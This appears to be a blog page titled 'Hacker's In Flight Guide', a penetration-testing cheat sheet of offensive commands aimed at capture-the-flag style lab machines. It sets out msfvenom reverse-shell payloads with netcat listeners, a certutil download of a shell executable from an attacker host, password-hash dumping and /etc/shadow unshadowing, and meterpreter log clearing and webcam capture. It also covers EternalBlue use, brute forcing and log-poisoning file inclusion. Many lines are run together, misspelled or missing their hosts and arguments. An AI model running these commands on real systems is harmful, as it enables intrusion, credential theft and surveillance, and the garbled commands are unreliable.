Hacker’s In Flight Guide
Resources on the Fly!
Home
BLOG
Quick References
NMAP
nmap -A -T4 -p-
– common and popular for scanning everythingnmap -sV -vv --script vuln
– this looks for vulnerabilities with a scriptnmap --script vuln -p 445
– searches for the most common vulnerabilitiesnmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
– enumerate smb using nmapnmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount
– enumerate RPC using nmap
SMBclient
smbclient -L \
smbclient //
– you can add directories after the target IP to try to connect
– this attempts to connect via smb
– you can try to connect with no password and see if it works
SMBget
smbget -R smb://
– download files on an SMB share
enum4linux
enum4linux -a
– this usually screws up, but sometimes works well
– we tee it to a file while still looking at the output
unshadow
unshadow /etc/passwd /etc/shadow > /tmp/readyforhashcat.txt
– this will print to an ‘unshadowed’ file, readable by hashcat
hashdump (meterpreter)
run post/windows/gather/hashdump
– done once you obtain a windows shell on a target box
– this is done within meterpreter
dirbuster
dirbuster
– this will open a GUI with dirbuster
– add ‘&’ at the end (dirbuster&) to continue to use the terminal window
– a wordlist will be needed to use dirbuster reconaissance
– Common Wordlist: /opt/DirBuster-0.12/directory-list-2.3-medium.txt
dirb
dirb http://
gobuster
gobuster -w /opt/DirBuster-0.12/directory-list-2.3-medium.txt -u
gobuster dir --url http://
– a tool used to search a server for directories specified in the wordlist
dirsearch
dirsearcy -u http://
– used to search directories on a server
– e = exclude status codes
sqlmap
sqlmap -u http://
sqlmap -u http://
sqlmap -u http://
sqlmap -u http://
sqlmap -u http://
find
find / -perm /4000 -type f -exec ls -ld {} ; 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
– use the man file to know more
– this command will find SUID bit sets particular to 4000
ftp
ftp
– give this a shot as anonymous
– if you’re in, try putting a file onto the machine
– use msfvenom to create malware to upload
Cadaver
cadaver http://
– used to interact with a website
– used to PUT files to a server
Hydra
hydra -l
– this brute forces services for login (ftp, ssh, etc…)
msfvenom
msfvenom -l | grep windows
– list the payloads available, and only show windowsmsfvenom --help-formats
– shows all of the formats availablemsfvenom -p windows/meterpreter/reverse_tcp
– options include:
– LHOST=LPORT=4444 -f aspx > ex.aspx
– LHOST=LPORT=4444 -f exe > sh.exe
– LHOST=LPORT=4444 -f war > shell.war
– 32 or 64 bit systems matter, so pay attention to the reverse shell
– p = payload
– f = file output
– put using ftp, or any other upload access
– use a handler to listen for the incoming connection
– Common Handlers: msfconsole, and netcat
SimpleHTTServer
python -m SimpleHTTPServer 80
– give access to wget and others on the target machine
mount
mount
mount
– create directory to mount to using ‘mkdir’
– use enumeration to find a mountable folder on target (smb)
netcat
netcat -nvlp 4444
– a listener waiting for a payload to call back
– can use windows/shell/reverse_tcp as payload (msfvenom)
JohnTheRipper
/opt/JohnTheRipper/run/ssh2john.py kay_id_rsa > forjohn.txt
– need to convert an RSA key so that john can crack it/opt/JohnTheRipper/run/john forjohn.txt -wordlist=/opt/rockyou.txt
– there are several other options for john… google them if needed
Hashcat
On Windowshashcat64.exe -a 0 -m
Great Resource:
Examples of Hashes (https://hashcat.net/wiki/doku.php?id=example_hashes)
Wireless .cap file
– Convert from .cap to a .hccapx file (google this)
– cap2hccapxcap2hccapx.bin file.cap output.hccapx
– command example:hashcat64.exe -m 2500 file.hccapx dictionary.txt
– newer versions only use hashcat.exe
Hydra
hydra -l -P
– you can use a different thread count with -t
– you can use different protocols with ssh and others instead of posthydra -l
hydra -l
WEB ENUMERATION
nikto
nikto -host
wfuzz
wfuzz -c --hh 60 -w dictionary.txt http://
Web Local File Inclusion
GET http://page.php?page=/var/log/apache2/access.log
inject to request under user-agent:
NOTE: you can use a ‘+’ where there would be a space in a command.
wpscan
wpscan –url http://apocalyst.htb –enumerate vp
CeWL
cewl
– CeWL (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers
DirBuster (GUI)
– used after creating a wordlist with CeWL
– The results will show different sizes and can be analyzed
TECHNIQUES:
Common Windows quick way in
Win 7 7601 SP1msfconsole> search MS17-010
– This is an extremely common vulnerability called EternalBlue
– use auxiliary/scanner/smb/smb_ms17_010
– set the standard options for meterpreter
– set payload as windows/x64/meterpreter
– can also google ‘Eternalblue’ to see some GitHub magic
Ubuntu Mount Shared Drive on VMWare
sudo vmhgfs-fuse -o nonempty -o allow_other .host:/data ./testmnt
Kali Create and Mount New Drive in VMWare
fdisk -l
g (create GPT partition table)
n (add a new partition – select your size – I used defaults)
w (write table to disk and exit)
mkfs.ext4 /dev/sdb1mkdir /mnt/newdrivemount -t ext4 /dev/sdb1 /mnt/newdrivemkdir /mnt/newdrive/testchown kali:kali /mnt/newdrive/test (asumes Kali 2020a)
make mount permanent through rebootsvim /etc/fstab
add to the bottom line of the file/dev/sdb1 /mnt/newdrive ext4 defaults 0 0
Unstable Shell –> Stable Shell
python -c "import tpy; pty.spawn('/bin/bash')"
ORpython -c 'import pty; pty.spawn("/bin/bash")'
– gives a shell
^z to foreground the shellstty raw -echo
– can’t type at this point…
specify F, G at the shellexport TERM=xtern
^l (that’s an el)
– now you can use the shell as normal
background (metasploit)
msf> background
– used to put a session in the background of msfconsole
– retrieve the session with msf> set session
msf> ^z can also be used to backround
sessions -l (that’s an el)
– used to list the open sessions after using background
suggester (metasploit)
msf> use post/multi/recon/local_exploit_suggester
– used once you are on a box
– set standard options and run
Meterpreter
msfconsole
– TIP: set the LHOST as tun0 (easier than typing your IP)
– Useful Commands while in meterpreter:
– search
– use # the number can be from the search criteria
– ^z to send a session to background
– sessions -l (that’s an el) to list sessions
– sessions -i # to interact with a background session
Common Commands after connecting include:
– getuid
– sysinfo
– pwd
– history
– whoami
– ls -alh
– uname -a
– touch
– getsyustem
– migrate
– clearev to clear application, system, and sescurity logs on Windows
– execute -f file.exe -i -H to execute a file on Windows target
– search -f file*.bat c:xamp to search for a file in a directory
– shell to get a to a standard shell instead of meterpreter
– webcam_list and webcam_snap to use a computer’s webcam
– download or upload
– run post/windows/gather/checkvm check for a virtual machine
– run post/multi/recon/local_exploit_suggester scan for suggestions
– run post/windows/manage/enable_rdp force RDP to be available
– run autoroute -h learn to use autoroute
– search server/socks4a start a proxy server from this session
– look for a script online called ‘LinEnumj.sh’, and ‘linuxprivchecker.py’
BurpSuite
– this is a GUI (installed on Kali and ParotOS)
– [PROXY TAB] –> [OPTIONS TAB] shows how to intercept traffic
– In a browser –> Manual Proxy –> 127.0.0.1 –> port 8080 –> all protocols
– BurpSuite –> turn intercept on
– use the FORWARD button to see the page reload to BurpSuite
– right click on returns –> send to TOOLS as needed
– REPEATER, INTRUDER, DECODER are some of the tools
– Brute Force –> highlight a section to set it up for changes
– [PAYLOADS TAB] –> put your list into the opstions, simple list
– uncheck the URL-encode at the bottom of the page
– clock START ATTACK –> look for indicators that it worked
bash scripting
– this is a complicated topic… you can automate your commands
– use #!/bin/bash to start your script
– as an example, you can use bash to convert to Base64
echo '
echo '
echo -n 'user:pass' base64
– Script: $(cat file.txt); do echo -n $cred | base64; done
– Note: $(cat file.txt) represents a variable
chmod for Windows
C:> icacls myfile.txt /grant Everyone:F
– this is for chmod 777
PowerUp.ps1
– used in Powershell to enumerate
– upload to Windows, then chmod to 777 (see above)C:> . .PowerUp.ps1 (that’s a dot, space, dot, forwardslash)
C:> Invoke-AllChecks
Windows – start/stop Service
C:> sc start
Wget for Windows
C:>
C:> certutil -urlcache -f http:///sh.exe c:sh.exe
– use whatever file you want in place of sh.exe
– once in a shell, run the sh.exe to reach out to the listener
RESOURCES:
Wapalyzer (for browsers)
– this is an install within your browser
– it will help with website enumeration
fuzzysecurity.com
– this is a good resource to have in the back pocket
– very useful for privilege escalation
psexec.py / wmiexec.py / smbexec.py
psexec.py pentest:’P3nT3st!’@10.10.10.10
– locate in the /opt/impacket/ folder
– installed with git clone, and then pip install
– good when you’re up against antivirus
– not as detectable as metasploit meterpreter
linpeas.sh
./linpeas.sh | tee linpeas.log.txt
– a great way to check a machine from the inside
– must upload first, then execute on target machine
– the tee command sends output to a file, while still seeing results
GitHub Suggester
python windows-exploit-suggester.py --database mssb.xls --systeminfo sysinfo.txt
– look for Sherlock or Watson on the web
– the syntax for the exploit is on the GitHub site
– system info was supplied by previous shell access
PHP-Reverse-Shell
– google for it, and upload it to target computer
– popular and easy
– change the LPORT, and LHOST
– set up a netcat listener to retrieve the connection
Spawn a TTY shell
– google for it, look for netsec in the results
– this will be needed if your privs don’t allow a TTY shell
– example script: python -c ‘import pty; pty.spawn( /bion/bash);